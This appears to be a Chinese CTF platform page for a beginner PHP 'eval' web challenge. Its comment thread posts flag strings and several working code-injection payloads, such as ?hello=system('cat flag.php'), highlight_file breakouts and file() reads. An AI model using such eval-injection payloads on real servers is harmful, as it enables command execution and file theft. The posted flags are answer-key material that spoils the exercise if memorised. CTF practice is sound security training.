evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 16934
提  示:
描  述:
eval
评论
xiaojiang8 2年前

flag{42514ad5a472a1c17919a0cf12eb1aa9};

回复 0

wxy1343 2年前

flag{616da37fa93c4832b309a22168ca486d}

回复 0

不知名学渣 2年前

/?hello=file_get_contents(%27flag.php%27),用file_get_contents也可以读取,就是不知道为什么无法在浏览器中显示出来?只能在F12源码中能看到被注释的flag.php内容?恳求大佬解答。

回复 3
19963445106 3月前

因为这是php文件,用cat和tac读也是,cat的结果只能看源码,tac因为php结构被破坏所以直接显示

回复 0

StevenXu 1年前

<php

回复 0

always 2年前

http://114.67.175.224:19137/?hello=$GLOBALS

回复 0

MuYangfool 2年前

?hello=);highlight_file(%27flag.php%27);var_dump(

回复 0

我爱你制杖 2年前

解题思路: 1.利用eval()函数可将函数中的参数当作php代码执行,故可通过命令执行漏洞system()函数去查看当前目录中的内容(如本题:?hello=system(".")来查看,获得flag.php文件名) 2.利用file()函数读取flag.php文件内容(如本题:?hello=file("flag.php"),需注意此处存在var_dun

回复 6

五无心惘然 2年前

flag{78096610f3a54eda62265ae8d6835aab}

回复 0

18244914085 2年前

直接使用system查看包含的文件flag.php, eval执行变量$a ?hello=system('cat flag.php | base64')

回复 1

Lsec 2年前

1:?hello=file('flag.php') 2:?hello=);highlight_file('flag.php');var_dump( 3:?hello=eval(system('cat flag.php | base64'))

回复 1

你呀你ii 2年前

?hello=eval(system('cat flag.php | base64'))

回复 4
baianquanzu 2年前

?hello=system('sort flag.php')

回复 0

xlxlxl 2年前

?hello=system('cat flag.php')

回复 1

凉情梦回 2年前

?hello=system('cat flag.php')

回复 3

liu666 2年前

flag{930e51a7a500775093c95aae8b67e404}

回复 3

userdong 2年前

?hello=system('cat flag.php')

回复 3

riacky 2年前

?hello=system('cat flag*')

回复 3

WriteUp

image
harry

1 金币

评分(9)

解题动态

testda 攻破了该题 1小时前
satuo 攻破了该题 1小时前
goeasy 攻破了该题 5小时前
867736371 攻破了该题 6小时前
废柴小白 攻破了该题 6小时前
19893123836 攻破了该题 6小时前
tcg979 攻破了该题 18小时前
AX渊仪 攻破了该题 23小时前
qwerfsafafa 攻破了该题 23小时前
太水了410410 攻破了该题 23小时前
6145 攻破了该题 1天前
zer0_h 攻破了该题 1天前
Hehe0619 攻破了该题 1天前
李嘉欣a 攻破了该题 1天前
嗨客111 攻破了该题 1天前
呆羊 攻破了该题 1天前
ahco 攻破了该题 1天前
17365797718 攻破了该题 1天前
你猜呀啊哈哈 攻破了该题 1天前
123456rue 攻破了该题 1天前
问题反馈